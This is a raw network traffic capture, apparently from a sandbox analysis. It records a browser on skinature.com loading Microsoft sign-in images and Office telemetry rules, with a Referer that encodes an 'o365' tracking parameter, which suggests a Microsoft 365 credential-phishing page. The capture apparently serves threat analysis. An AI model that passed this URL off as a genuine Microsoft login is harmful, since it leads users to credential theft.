                                                                    2024-10-28 13:03:21 UTC663OUTGET /favicon.ico HTTP/1.1
                                                                    Host: skinature.com
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                    Sec-Fetch-Site: same-origin
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: image
                                                                    Referer: https://skinature.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdEVkZhekE9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123N
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-10-28 13:03:21 UTC238INHTTP/1.1 500 Internal Server Error
                                                                    Date: Mon, 28 Oct 2024 13:03:21 GMT
                                                                    Server: Apache
                                                                    Upgrade: h2,h2c
                                                                    Connection: Upgrade, close
                                                                    host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                    Content-Length: 0
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    23192.168.2.44978013.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:21 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:21 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:21 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 407
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                    ETag: "0x8DC582B9698189B"
                                                                    x-ms-request-id: 226d2935-b01e-001e-729c-270214000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130321Z-r197bdfb6b47gqdjqh2kwsuz8c00000005c000000000b9ep
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:21 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    24192.168.2.44977913.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:21 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:21 UTC491INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:21 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 486
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                    ETag: "0x8DC582BB344914B"
                                                                    x-ms-request-id: 0fe0dd21-c01e-0066-771c-26a1ec000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130321Z-16849878b78p8hrf1se7fucxk800000005tg00000000kyx7
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    X-Cache-Info: L1_T2
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:21 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    25192.168.2.44977713.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:21 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:21 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:21 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 427
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                    ETag: "0x8DC582BA310DA18"
                                                                    x-ms-request-id: 6b0d144c-801e-007b-3a49-27e7ab000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130321Z-16849878b7828dsgct3vrzta7000000003dg00000000enn2
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:21 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    26192.168.2.44977113.107.246.454431704C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:21 UTC651OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                                                    Host: aadcdn.msauth.net
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: image
                                                                    Referer: https://skinature.com/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-10-28 13:03:21 UTC785INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:21 GMT
                                                                    Content-Type: image/svg+xml
                                                                    Content-Length: 1435
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=31536000
                                                                    Content-Encoding: gzip
                                                                    Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                                                    ETag: 0x8DB5C3F4911527F
                                                                    x-ms-request-id: d60cce56-801e-0052-4171-28c801000000
                                                                    x-ms-version: 2009-09-19
                                                                    x-ms-lease-status: unlocked
                                                                    x-ms-blob-type: BlockBlob
                                                                    Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                    Access-Control-Allow-Origin: *
                                                                    x-azure-ref: 20241028T130321Z-17c5cb586f6lxnvg801rcb3n8n00000004ug0000000057kt
                                                                    x-fd-int-roxy-purgeid: 4554691
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:21 UTC1435INData Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5
                                                                    Data Ascii: WMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    27192.168.2.44978113.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:21 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:21 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:21 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 486
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                    ETag: "0x8DC582B9018290B"
                                                                    x-ms-request-id: b80877bf-b01e-0084-28e3-26d736000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130321Z-r197bdfb6b48pcqqxhenwd2uz800000005qg00000000c1h4
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:21 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    28192.168.2.44976813.107.246.454431704C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:21 UTC671OUTGET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1
                                                                    Host: aadcdn.msauth.net
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: image
                                                                    Referer: https://skinature.com/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-10-28 13:03:21 UTC779INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:21 GMT
                                                                    Content-Type: image/svg+xml
                                                                    Content-Length: 2407
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=31536000
                                                                    Content-Encoding: gzip
                                                                    Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                                                    ETag: 0x8DB5C3F499A9B99
                                                                    x-ms-request-id: 7677466b-301e-002d-2c36-277025000000
                                                                    x-ms-version: 2009-09-19
                                                                    x-ms-lease-status: unlocked
                                                                    x-ms-blob-type: BlockBlob
                                                                    Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                    Access-Control-Allow-Origin: *
                                                                    x-azure-ref: 20241028T130321Z-16849878b7867ttgfbpnfxt44s00000004x000000000ccfx
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:21 UTC2407INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 59 3d 73 dd 38 12 cc af ea fe 03 eb 6d 72 17 88 02 66 f0 79 b5 ba e0 98 38 a0 52 05 ca ec 95 6c ab 4e 6b bb 6c af b5 3f ff ba 07 e0 7b 24 94 6c 7c 65 27 7a 4d 02 33 c3 c1 a0 a7 01 ff fa ed c7 87 e9 e5 e9 e1 fb c7 9b 53 28 a7 e9 e3 e3 d3 87 8f df db ef 1f 4f 8f 2f ff f9 fc e7 cd c9 4d 6e 0a 65 e2 b3 f7 4f cf cf 37 a7 4f 9f 3f 3d 9e a6 3f 7f 7f fe f4 ed e6 f4 f1 fb f7 2f ff ba be 7e 79 79 99 5f 74 fe fc f5 c3 b5 38 e7 ae 61 f8 f4 ef bf ff ed d7 df df 7e fb ef f4 f4 00 2b f9 9d 24 a7 e1 2a a6 b7 7a 15 ea 83 5c 95 f7 92 ae 7e cb ef 4a 78 7c 17 1e 1f 1f c2 e6 e0 97 f7 f6 cf 0c 7c 79 fb fd a3 3d be fa fa c7 f3 e3 cd e9 f1 c7 e3 a7 cf 0f 0f a7 e9 b7 e7 a7 2f e3 33 f8 b9 15 9d 6b 4e 32 b9 c5 a7 b9 48 08 08 df 3b 3c 73 79 8a b3 04
                                                                    Data Ascii: Y=s8mrfy8RlNkl?{$l|e'zM3S(O/MneO7O?=?/~yy_t8a~+$*z\~Jx||y=/3kN2H;<sy


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    29192.168.2.44976913.107.246.454431704C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:21 UTC654OUTGET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1
                                                                    Host: aadcdn.msauth.net
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: image
                                                                    Referer: https://skinature.com/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-10-28 13:03:21 UTC805INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:21 GMT
                                                                    Content-Type: image/svg+xml
                                                                    Content-Length: 199
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=31536000
                                                                    Content-Encoding: gzip
                                                                    Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                                                    ETag: 0x8DB5C3F49C21D98
                                                                    x-ms-request-id: 6c15f187-201e-004b-54c1-2748ba000000
                                                                    x-ms-version: 2009-09-19
                                                                    x-ms-lease-status: unlocked
                                                                    x-ms-blob-type: BlockBlob
                                                                    Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                    Access-Control-Allow-Origin: *
                                                                    x-azure-ref: 20241028T130321Z-17c5cb586f6zrq5bnguxgu7frc00000005qg00000000c8g5
                                                                    x-fd-int-roxy-purgeid: 4554691
                                                                    X-Cache: TCP_HIT
                                                                    X-Cache-Info: L1_T2
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:21 UTC199INData Raw: 1f 8b 08 00 00 00 00 00 04 00 75 8f bd ae c2 30 0c 85 5f 25 32 6b d5 38 3f 88 80 92 0e 77 ea 00 6b 87 bb 21 08 4d a4 d2 22 62 35 3c fe 4d 2e 62 44 b6 e4 63 fb d3 b1 6c d3 3a b2 d7 7d 9a 93 83 40 f4 38 70 9e 73 6e b3 6a 97 e7 c8 25 22 f2 42 00 cb f1 4a c1 81 36 c0 82 8f 63 a0 b7 5e a3 cf 3f cb cb 01 32 64 da 94 84 ce 52 a4 c9 77 e7 94 3c 25 cb df 9d 7d fa 0b 7d 73 b9 c5 69 72 30 2f b3 07 de d9 c7 99 02 bb 3a 38 29 d3 28 1c 84 ec 05 0e 0a 83 5e 75 bb dd 99 a3 30 b5 94 55 af cc 49 c8 46 c9 de 0c 02 7b 5d a8 c2 ee 5b 2d e5 b1 ce ff d5 ef c7 7e a3 b1 46 bd 50 5f ea fe 00 a3 0d 47 ef fa 00 00 00
                                                                    Data Ascii: u0_%2k8?wk!M"b5<M.bDcl:}@8psnj%"BJ6c^?2dRw<%}}sir0/:8)(^u0UIF{][-~FP_G


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    30192.168.2.44977013.107.246.454431704C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:21 UTC650OUTGET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1
                                                                    Host: aadcdn.msauth.net
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: image
                                                                    Referer: https://skinature.com/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-10-28 13:03:21 UTC778INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:21 GMT
                                                                    Content-Type: image/svg+xml
                                                                    Content-Length: 673
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=31536000
                                                                    Content-Encoding: gzip
                                                                    Last-Modified: Wed, 24 May 2023 10:11:46 GMT
                                                                    ETag: 0x8DB5C3F47E260FD
                                                                    x-ms-request-id: c9c40271-601e-006d-06aa-26771d000000
                                                                    x-ms-version: 2009-09-19
                                                                    x-ms-lease-status: unlocked
                                                                    x-ms-blob-type: BlockBlob
                                                                    Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                    Access-Control-Allow-Origin: *
                                                                    x-azure-ref: 20241028T130321Z-16849878b78qwx7pmw9x5fub1c000000033g00000000h4t5
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:21 UTC673INData Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41
                                                                    Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9!9A


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    31192.168.2.44977313.107.253.454431704C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:21 UTC649OUTGET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1
                                                                    Host: logincdn.msauth.net
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: image
                                                                    Referer: https://skinature.com/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-10-28 13:03:21 UTC806INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:21 GMT
                                                                    Content-Type: image/svg+xml
                                                                    Content-Length: 276
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=31536000
                                                                    Content-Encoding: gzip
                                                                    Last-Modified: Wed, 22 Jan 2020 00:38:00 GMT
                                                                    ETag: 0x8D79ED35591CF44
                                                                    x-ms-request-id: 553ba476-201e-006c-5f1c-2928c1000000
                                                                    x-ms-version: 2009-09-19
                                                                    x-ms-lease-status: unlocked
                                                                    x-ms-blob-type: BlockBlob
                                                                    Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                    Access-Control-Allow-Origin: *
                                                                    x-azure-ref: 20241028T130321Z-17fbfdc98bbt5dtr27n1qp1eqc00000005cg00000000070z
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache-Info: L2_T2
                                                                    X-Cache: TCP_REMOTE_HIT
                                                                    Accept-Ranges: bytes
